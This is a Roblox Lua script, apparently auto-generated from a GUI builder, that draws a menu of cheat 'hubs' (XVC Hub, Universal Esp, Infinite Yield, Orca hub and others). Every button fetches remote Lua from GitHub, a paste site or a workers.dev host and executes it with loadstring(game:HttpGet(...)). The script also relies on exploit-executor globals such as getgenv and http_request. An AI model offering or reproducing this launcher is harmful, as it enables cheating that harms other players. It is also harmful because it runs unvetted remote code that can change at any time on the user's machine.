-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local TextButton = Instance.new("TextButton")
local TextButton_2 = Instance.new("TextButton")
local TextButton_3 = Instance.new("TextButton")
local TextLabel = Instance.new("TextLabel")
local TextButton1 = Instance.new("TextButton")
local TextLabel_2 = Instance.new("TextLabel")
local TextButton_4 = Instance.new("TextButton")
local TextButton_5 = Instance.new("TextButton")
local TextButton_6 = Instance.new("TextButton")

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(1, 0, 2)
Frame.BorderColor3 = Color3.fromRGB(68, 0, 255)
Frame.BorderSizePixel = 2
Frame.Position = UDim2.new(0.0135064749, 0, 0.543335855, 0)
Frame.Size = UDim2.new(0.387135595, 0, 0.432710201, 0)

TextButton.Parent = Frame
TextButton.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextButton.BorderColor3 = Color3.fromRGB(68, 0, 255)
TextButton.Position = UDim2.new(0.0802120194, 0, 0.244293272, 0)
TextButton.Size = UDim2.new(0, 200, 0, 50)
TextButton.Font = Enum.Font.DenkOne
TextButton.Text = "XVC Hub"
TextButton.TextColor3 = Color3.fromRGB(255, 255, 255)
TextButton.TextSize = 20.000
TextButton.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)

TextButton_2.Parent = Frame
TextButton_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextButton_2.BorderColor3 = Color3.fromRGB(68, 0, 255)
TextButton_2.Position = UDim2.new(0.0802120194, 0, 0.4796049, 0)
TextButton_2.Size = UDim2.new(0, 200, 0, 50)
TextButton_2.Font = Enum.Font.DenkOne
TextButton_2.Text = "Universal Esp"
TextButton_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextButton_2.TextSize = 20.000
TextButton_2.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)

TextButton_3.Parent = Frame
TextButton_3.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextButton_3.BorderColor3 = Color3.fromRGB(68, 0, 255)
TextButton_3.Position = UDim2.new(0.0802121088, 0, 0.707704067, 0)
TextButton_3.Size = UDim2.new(0, 200, 0, 50)
TextButton_3.Font = Enum.Font.DenkOne
TextButton_3.Text = "Infinite Yield"
TextButton_3.TextColor3 = Color3.fromRGB(255, 255, 255)
TextButton_3.TextSize = 20.000
TextButton_3.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.BorderColor3 = Color3.fromRGB(68, 0, 255)
TextLabel.BorderSizePixel = 0
TextLabel.Position = UDim2.new(0.329802573, 0, 0.0114864381, 0)
TextLabel.Size = UDim2.new(0, 200, 0, 50)
TextLabel.Font = Enum.Font.DenkOne
TextLabel.Text = "What script?"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextSize = 41.000

TextButton1.Name = "TextButton1"
TextButton1.Parent = Frame
TextButton1.BackgroundColor3 = Color3.fromRGB(156, 43, 31)
TextButton1.BorderColor3 = Color3.fromRGB(67, 26, 255)
TextButton1.Position = UDim2.new(0.465172201, 0, 0.879251361, 0)
TextButton1.Size = UDim2.new(0, 43, 0, 21)
TextButton1.Font = Enum.Font.SourceSans
TextButton1.Text = "Close"
TextButton1.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton1.TextSize = 14.000

TextLabel_2.Parent = Frame
TextLabel_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_2.BorderSizePixel = 0
TextLabel_2.Position = UDim2.new(0.438101083, 0, 0.158686996, 0)
TextLabel_2.Size = UDim2.new(0, 73, 0, 18)
TextLabel_2.Font = Enum.Font.DenkOne
TextLabel_2.Text = "universal"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 14.000
TextLabel_2.TextWrapped = true

TextButton_4.Parent = Frame
TextButton_4.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextButton_4.BorderColor3 = Color3.fromRGB(68, 0, 255)
TextButton_4.Position = UDim2.new(0.559820175, 0, 0.243749306, 0)
TextButton_4.Size = UDim2.new(0, 200, 0, 50)
TextButton_4.Font = Enum.Font.DenkOne
TextButton_4.Text = "Ghost hub(has a key)"
TextButton_4.TextColor3 = Color3.fromRGB(255, 255, 255)
TextButton_4.TextSize = 20.000
TextButton_4.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)

TextButton_5.Parent = Frame
TextButton_5.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextButton_5.BorderColor3 = Color3.fromRGB(68, 0, 255)
TextButton_5.Position = UDim2.new(0.559820235, 0, 0.477487594, 0)
TextButton_5.Size = UDim2.new(0, 200, 0, 50)
TextButton_5.Font = Enum.Font.DenkOne
TextButton_5.Text = "SCRIPTHUBV3"
TextButton_5.TextColor3 = Color3.fromRGB(255, 255, 255)
TextButton_5.TextSize = 20.000
TextButton_5.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)

TextButton_6.Parent = Frame
TextButton_6.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextButton_6.BorderColor3 = Color3.fromRGB(68, 0, 255)
TextButton_6.Position = UDim2.new(0.559820235, 0, 0.705336571, 0)
TextButton_6.Size = UDim2.new(0, 200, 0, 50)
TextButton_6.Font = Enum.Font.DenkOne
TextButton_6.Text = "Orca hub"
TextButton_6.TextColor3 = Color3.fromRGB(255, 255, 255)
TextButton_6.TextSize = 20.000
TextButton_6.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)

-- Scripts:

local function FLUPM_fake_script() -- Frame.DragScript 
	local script = Instance.new('LocalScript', Frame)

	local frame = script.Parent
	local UserInputService = game:GetService("UserInputService")
	local TweenService = game:GetService("TweenService")
	local dragging = false
	local dragStart = nil
	local startPos = nil
	
	-- Load animation
	frame.Size = UDim2.new(0, 0, 0, 0)
	frame.Position = UDim2.new(0.42, 0, 0.32, 0)
	frame.BackgroundTransparency = 1
	
	local sizeTween = TweenService:Create(frame, TweenInfo.new(0.5, Enum.EasingStyle.Back, Enum.EasingDirection.Out), {
		Size = UDim2.new(0, 531, 0, 344),
		BackgroundTransparency = 0.1
	})
	
	sizeTween:Play()
	
	
	frame.InputBegan:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 then
			dragging = true
			dragStart = input.Position
			startPos = frame.Position
		end
	end)
	
	UserInputService.InputChanged:Connect(function(input)
		if dragging and input.UserInputType == Enum.UserInputType.MouseMovement then
			local delta = input.Position - dragStart
			frame.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
		end
	end)
	
	UserInputService.InputEnded:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 then
			dragging = false
		end
	end)
end
coroutine.wrap(FLUPM_fake_script)()
local function PQSW_fake_script() -- Frame.HideFrameScript 
	local script = Instance.new('LocalScript', Frame)

	local TweenService = game:GetService("TweenService")
	local frame = script.Parent
	local button = frame:WaitForChild("TextButton1") -- You can change this to the specific button you want
	
	-- Create tween info for smooth animation
	local tweenInfo = TweenInfo.new(
		0.5, -- Time (seconds)
		Enum.EasingStyle.Quad, -- Easing style
		Enum.EasingDirection.Out, -- Easing direction
		0, -- Repeat count (0 = no repeat)
		false, -- Reverses
		0 -- Delay time
	)
	
	-- Create the tween to fade out and scale down
	local hideTween = TweenService:Create(
		frame,
		tweenInfo,
		{
			BackgroundTransparency = 1, -- Fade to transparent
			Size = UDim2.new(0, 0, 0, 0), -- Scale down to nothing
			Position = UDim2.new(0.42, 0, 0.32, 0) -- Move to center while shrinking
		}
	)
	
	-- Connect the button click event
	button.MouseButton1Click:Connect(function()
		hideTween:Play()
		
		-- Hide the frame completely after tween finishes
		hideTween.Completed:Connect(function()
			frame.Visible = false
		end)
	end)
end
coroutine.wrap(PQSW_fake_script)()
local function IJMOR_fake_script() -- TextButton.Button Function 
	local script = Instance.new('Script', TextButton)

	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		getgenv().request = http_request
		http.request = http_request
	
		loadstring(game:HttpGet("https://rayfield.xvchubontop.workers.dev/"))()
	end)
end
coroutine.wrap(IJMOR_fake_script)()
local function WUGPV_fake_script() -- TextButton_2.Button Function 
	local script = Instance.new('Script', TextButton_2)

	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		getgenv().request = http_request
		http.request = http_request
	
		loadstring(game:HttpGet("https://raw.githubusercontent.com/Exunys/AirHub/main/AirHub.lua"))()
	end)
end
coroutine.wrap(WUGPV_fake_script)()
local function WHMVLH_fake_script() -- TextButton_3.Button Function 
	local script = Instance.new('Script', TextButton_3)

	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		getgenv().request = http_request
		http.request = http_request
	
		loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source"))()
	end)
end
coroutine.wrap(WHMVLH_fake_script)()
local function VQGKO_fake_script() -- TextButton_4.Button Function 
	local script = Instance.new('Script', TextButton_4)

	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		getgenv().request = http_request
		http.request = http_request
	
		loadstring(game:HttpGet("https://pastefy.app/h9sod1M8/raw"))()
	end)
end
coroutine.wrap(VQGKO_fake_script)()
local function JXCZ_fake_script() -- TextButton_5.Button Function 
	local script = Instance.new('Script', TextButton_5)

	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		getgenv().request = http_request
		http.request = http_request
	
		loadstring(game:HttpGet("https://raw.githubusercontent.com/scripthubekitten/SCRIPTHUBV3/main/SCRIPTHUBV3", true))()
	end)
end
coroutine.wrap(JXCZ_fake_script)()
local function QNXP_fake_script() -- TextButton_6.Button Function 
	local script = Instance.new('Script', TextButton_6)

	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		getgenv().request = http_request
		http.request = http_request
	
		loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/richie0866/orca/master/public/snapshot.lua"))()
	end)
end
coroutine.wrap(QNXP_fake_script)()
